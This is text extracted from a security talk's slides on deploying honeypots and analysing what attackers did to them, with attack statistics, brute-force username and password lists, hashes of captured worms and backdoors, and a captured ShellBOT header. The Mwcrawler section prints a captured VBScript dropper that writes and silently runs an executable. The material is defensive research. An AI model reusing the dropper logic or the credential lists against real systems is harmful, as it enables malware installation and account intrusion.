Be vewy, vewy quiet….

let’s watch some hackers..

Interactive portion intro

Whoami

What is a Honeypot?

Different Honeypots

Why Honeypots?

Things I discovered

Stratagem

Interactive portion end results

Interactive portion

SSID – FBI MobileIP address – 192.168.2.5User ID – bsidesThe password is…detroit (told you it was easy)

FatherHusband

Geek

Antagonist of the shiny things

ShadowServer.org volunteer

Security analyst

Whoami

A Honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource. (May 2003)

Why Honeypots?

Why Honeypots?

Low interactionServer Honeypots

HoneyD

Low interactionServer Honeypots

Conpot

Different Honeypots

Clientside Honeypots

Windows XP SP 0 Windows Vista SP 0

Client HoneypotsHigh Interaction

Different Honeypots

Initial Research

A word of advice on using an EC2 instance.

GeoIP locationDionaea - Ireland

Dionaea stats

Started 3/7/2013Stopped 3/9/2013

Started 3/12/2013Stopped 3/14/2013

Graphs are courtesy of DionaeaFRtool

Dionaea stats

• Don’t forget to add your API key from VirusTotal to your config file!!

• If you don’t add the API key, then the pretty visualization tool can’t do it’s job and you have to do manually!!!

144

109

71

56

1714

14

99

8

Dionaea statsTop 10 IP addresses

Wireshark AnalysisAttack Attempts

Malware CapturesMD5 Virus Total

Detection Ratio

Common name Source IP Address/WhoIs

78c9042bbcefd65beaa0d40386da9f89

44 / 46 Microsoft -Worm:Win32/Conficker.C

• 209.190.25.37

• XLHost – VPS provider

• http://www.xlhost.com/

7acba0d01e49618e25744d9a08e6900c

45 / 46 Microsoft -Worm:Win32/Conficker.B

69.28.137.10LimeLight Networks - a Digital Presence Management companyhttp://www.limelight.com/

90c081de8a30794339d96d64b86ae194

42 / 43 Kaspersky -Backdoor.Win32.Rbot.aftu

69.38.10.83WindStream Communications –Voice and data providerhttp://NuVox.net

bcaef2729405ae54d62cb5ed097efa12

43 / 44 Kaspersky -Backdoor.Win32.Rbot.bqj

69.9.236.128Midwest Communications –Comcast/WideOpenWest parallelhttp://midco.net/

GeoIP locationDionaea - recent

Dionaea •Detection

Dionaea •Detection

Dionaea •Detection

Kippo

Started 2/27/2013Stopped 3/1/2013

IP addresses• 14 unique IP addresses• Maximum password attempts – 1342• Successful logins – 7• Replay scripts – 1

•Files uploaded - 1

1342

1190

454

163163

156

28 2216

54

1 1

Kippo stats

2/27 to 3/1

Attacker's IP addresses/connection attempts

GeoIP locationKippo – recent

Kippo statsro

ot

bin

ora

cle

test

nagio

s

mart

in

toor

ftpuser

user

postg

res

info

webm

aste

r

apache

backup

guest

r00t

public

gre

en

dem

o

sit

e

jeff

andy

i-heart

user0

conte

nt

1856

6717 10 9 6 6 6 5 5 5 5 4 4 4 4 4 4 4 4 4 4 4 4 3

Top 25 User names

2/27 – 3/1

Times tried

Kippo stats

27

16

9 9 98

7 7 7 7 7 7 7 7 7 7 76 6 6

Top 25 Passwords

2/27 to 3/1

Tries

Kippo stats

Accounts that used 123456 as password

User ID Triesroot 7ftpuser 3oracle 3andy 2info 2jeff 2site 2test 2webmaster 2areyes 1brian 1

“7 successful logons? But your chart says 27 used the password of 123456?! WTF?”

Kippo stats

root öÎÄ¥þ.òÄ¿Â¥ root !Q@W#E$root !@$#jMu2vEUIOLweoP#!TTG$@#dsgfGR#$sgs root !Q@W#E$Rroot $hack4m3baby#b1gbroth3r$ root !Q@W#E$R%root 654321 root !Q@W#E$R%Troot Ki!l|iN6#Th3Ph03$%nix@NdR3b!irD root !Q@W#E$R%T^root @!#$%&*Th3@#$!F0RcE%&*@#IS!@#$%!& root !Q@W#E$R%T^Yroot diffie-hellman-group-exchange-sha11 root !Q@W#E$R%T^Y&root 123 root !Q@W#E$R%T^Y&Uroot 1234 root !Q@W#E$R%T^Y&U*root 12345 root !Q@W#E$R%T^Y&U*Iroot 1234567 root !Q@W#E$R%T^Y&U*I(root 12345678 root !Q@W#E$R%T^Y&U*I(Oroot 123456789 root !Q@W#E$R%T^Y&U*I(O)root deathfromromaniansecurityteamneversleepba root !Q@W#E$R%T^Y&U*I(O)Proot rooooooooooooooooooooooooooooooooot root !Q@W#E$R%T^Y&U*I(O)P_

Interesting passwords

Kippo statsFile downloaded

psyBNC 2.3.2

------------

This program is useful for people who cannot be on irc all the time. Its used to keep a connection to irc and your irc client connected, or also allows to act as a normal bouncer by disconnecting from the irc server when the client disconnects.

Kippo

Started 5/31/2013Stopped 6/1/2013

IP addresses• Unique IP addresses - 20• Maximum password attempts – 1098• Successful logins – 16• Replay scripts – 4

•Files uploaded - 1

670

398

273

9088

6462

2825

135 5 4

22

11

11

1

Kippo stats

5/31 to 6/1

Attackers IP addresses/connection attempts

22

12

10 109 9 9 9

8 87 7 7 7

6 6 6 6 6 6 6 6 65 5

Top 25 passwords

5/31 to 6/1

Attempts

Kippo stats

1184

17 15 11 8 8 7 6 6 5 5 4 4 4 4 4 4 4 4 4 4 4 4 4 4

Top 25 user names

5/31 to 6/1

Login attempts

Kippo stats

Kippo statsReplay script – 20130603-104907-9177.log

Just trying to run Perl

Kippo statsReplay script – 20130530-134418-3935.log

Upload of shellbot.pl

Kippo statsFile downloaded

#!/usr/bin/perl## ShellBOT by: devil__

Discovered: June 3, 2005Updated: April 30, 2010 3:46:09 AMType: TrojanSystems Affected:Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP

Backdoor.Shellbot is a detection name used by Symantec to identify malicious software programs that share the primary functionality of enabling a remote attacker to have access to or send commands to a compromised computer.

As the name suggests, these threats are used to provide a covert channel through which a remote attacker can access and control a computer. The Trojans vary in sophistication, ranging from those that only allow for limited functions to be performed to those that allow almost any action to be carried out, thus allowing the remote attacker to almost completely take over control of a computer.

Backdoor.ShellbotRisk Level 1: Very Low

Kippo statsReplay script – 20130602-105723-5678.log

Upload a tar.gz and trips a Python reply script

KippoDetection

CTF replay scripts

Kippo

• Config file changes• Custom reply files

Lessons learned

HoneyD

Amun

Started 5/29 Stopped 5/30

IP addresses• Unique IP addresses - 3

• Files uploaded - 2

Amun

Azenv.php (uploaded twice)

• ProxyJudge script

Files uploaded

Thug

• Honeyclient• Mimics client behavior• Browser• Plug-ins for 3rd party apps

Mwcrawler

PE32 files--- SCAN SUMMARY ---Known viruses: 2340387Engine version: 0.97.8Scanned directories: 1Scanned files: 445Infected files: 44Data scanned: 510.42 MBData read: 353.98 MB (ratio 1.44:1)Time: 147.925 sec (2 m 27 s)

Data--- SCAN SUMMARY ---Known viruses: 2340387Engine version: 0.97.8Scanned directories: 1Scanned files: 4Infected files: 1Data scanned: 1.04 MBData read: 0.41 MB (ratio 2.57:1)Time: 7.612 sec (0 m 7 s)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Untitled Document</title> </head><body>

Mwcrawler

<p align="center"><h1>We're sorry,</h1><h2>The site is temporarlyunavailable. Please check in next few days</h2></p></body></html><SCRIPT Language=VBScript><!--DropFileName = "svchost.exe“ WriteData =

<Lots of shellcode>

Set FSO = CreateObject("Scripting.FileSystemObject")DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileNameIf FSO.FileExists(DropPath)=False ThenSet FileObj = FSO.CreateTextFile(DropPath, True)For i = 1 To Len(WriteData) Step 2FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))NextFileObj.CloseEnd IfSetWSHshell = CreateObject("WScript.Shell")WSHshell.Run DropPath, 0//--></SCRIPT>

How you can your netbook useful and fun again!

Project page

Goals◦ Documentation

Tools◦ Honeypots

◦ Network

◦ Malware

◦ Forensics

◦ Tools

Stratagemhttp://sourceforge.net/projects/stratagem/

Honeypots◦ Dionaea

◦ Kippo

◦ Glastopf

◦ HoneyD

◦ Amun

◦ Labrea

◦ Tinyhoneypot

◦ Thug

◦ Conpot

Stratagem

Network

◦ Scapy

◦ proxychains

◦ Ngrep

◦ Network Miner

◦ Amun

◦ Xplico

◦ Capanalysis

◦ Network

Malware

◦ Mwcrawler

◦ Yara

◦ ClamAV

Stratagem Forensics

◦ Volatility

Tools

◦ Tor

◦ i2p

◦ Conky

◦ Guake

◦ Terminator

Stratagem

Capanalysis

Stratagem

Capanalysis

Next?

Resources

• A host at $IP ($location)tried to log into my honeypot's fake Terminal Services server

• GET-based RFI attack from $IP ($location)• A host at $IP ($location)tried to log into my honeypot's fake MSSQL

Server

http://inguardians.com/

Resources

Resources

http://www.enisa.europa.eu/activities/cert/support/proactive-detection/proactive-detection-of-security-incidents-II-honeypots/at_download/fullReport

Honeydrive

Keith Dixon@Tazdrumm3r#misec – Tazdrumm3rtazdrummer@gmail.comhttp://tazdrumm3r.wordpress.com